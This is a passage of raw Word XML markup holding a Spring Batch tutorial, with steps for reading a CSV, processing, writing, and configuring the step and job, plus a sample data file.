          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3078F714"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2001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Getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA2F565" w14:textId="429AFA43"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200187"/>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2F091881" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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D5B4A6F">
          <v:rect id="_x0000_i2181" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFDD253" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Reader - Read from CSV</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930A92A"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD66FF2"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latFileItemReader</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Person</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read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F917FE4"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FlatFileItemReaderBuilder</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Person</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE413BC"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am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personItemReader"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5FF31"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source</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lassPathResourc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ample-data.csv"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ABEA38"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elimited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29454401"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ames</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first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lastName"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614EB626"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argetType</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Person</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class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AEBD34"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061B85E4" w14:textId="60ED9B3E"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6A4656C7" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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4339BF">
          <v:rect id="_x0000_i2182" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C0571" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 4: Processor (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5D3AC7"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33477"/>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ItemProcess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mplement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temProcessor</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Pers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2A4CBEB"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3347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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172FD83B"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3347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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> process</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Person</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pers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1870B74"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33477"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        pers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etFirst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ers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First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toUpperCase</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CF2793"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3347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person</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E025A"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33477"/>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EF955FC" w14:textId="4F1B7AB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33477"/>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21425953" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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80B41C7">
          <v:rect id="_x0000_i2183" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0969775C" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 5: Writer - Write to Console or DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB1BB8"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27569"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C232A72"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27569"/>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temWriter</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Person</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ri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C2057FD"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275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items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FDC796D"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275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o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Person</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> person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tem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82B0F75"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275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ystem</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u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intl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Writing: "</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erson</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FCD292"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275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C27076E"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275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D4A8ED1" w14:textId="4F2EE9E8"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27569"/>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735E7F39" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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2E776FC">
          <v:rect id="_x0000_i2184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43AED0" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 6: Configure Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1CDAF"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422CAC42"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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> step1</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epBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> stepBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D93937"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temReader</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Person</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reader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674D9A3"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temProcessor</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Pers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processor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDEFD9"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ItemWriter</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Person</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ri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677230F"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stepBuilderFactory</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tep1"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6388DE5F"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Pers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erson</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chunk</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7E03F"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ad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eader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F27C6B"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ocesso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ocessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9C032B"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writ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writer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B324A7B"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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A9CAA" w14:textId="60C6BA84"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360A8C75" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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4CC9FF3">
          <v:rect id="_x0000_i2185" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB37F9" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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tep 7: Configure Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F93D07E"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846709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2465F"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846709"/>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Job</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> importUserJob</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JobBuilderFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> jobBuilderFacto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ep</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> step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64260C2"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84670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jobBuilderFactory</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ge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importUserJob"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86DFCD"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84670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crementer</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unIdIncrementer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20446F7A"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84670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fl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tep1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C75510A"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84670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end</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB2F5E7" w14:textId="77777777"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84670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uild</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C8BAB" w14:textId="48B0F754" w:rsidR="00B22855" w:rsidRPr="00CE4B9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846709"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950A0D3" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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211787">
          <v:rect id="_x0000_i2186" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1A4CB1" w14:textId="77777777" w:rsidR="00B22855" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22855" w:rsidP="00832B7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BC6B53F" w14:textId="77777777" w:rsidR="00B22855" w:rsidRPr="00CE4B95" w:rsidRDefault="00B22855" w:rsidP="00832B7B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3536999E" w14:textId="1DFCF16D" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 8: Run the Batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB00982" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B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your Application.java, just annotate with @SpringBootApplication and run the app. Spring Boot will auto-trigger the batch job on startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69822A" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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5905F40">
          <v:rect id="_x0000_i2187" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3591A" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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SV Sample (resources/sample-data.csv)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A859541" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B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ohn,Doe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB8EDF" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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ne,Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364B396" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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EA2DF7C">
          <v:rect id="_x0000_i2188" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="294A72A3" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7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eal Projects Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281C9555" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Reader from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DB</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Kafka</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REST API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B99A79B" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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riter to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DB</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File</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Email</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Elastic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFDB53" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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 JobLauncher to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>manually trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a batch job via REST or schedule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4DB5EC" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95"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9646B98">
          <v:rect id="_x0000_i2189" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E05953" w14:textId="77777777" w:rsidR="00832B7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00832B7B" w:rsidP="00832B7B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FC0468" w14:textId="77777777" w:rsidR="00484F17" w:rsidRPr="00CE4B95" w:rsidRDefault="00484F17">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
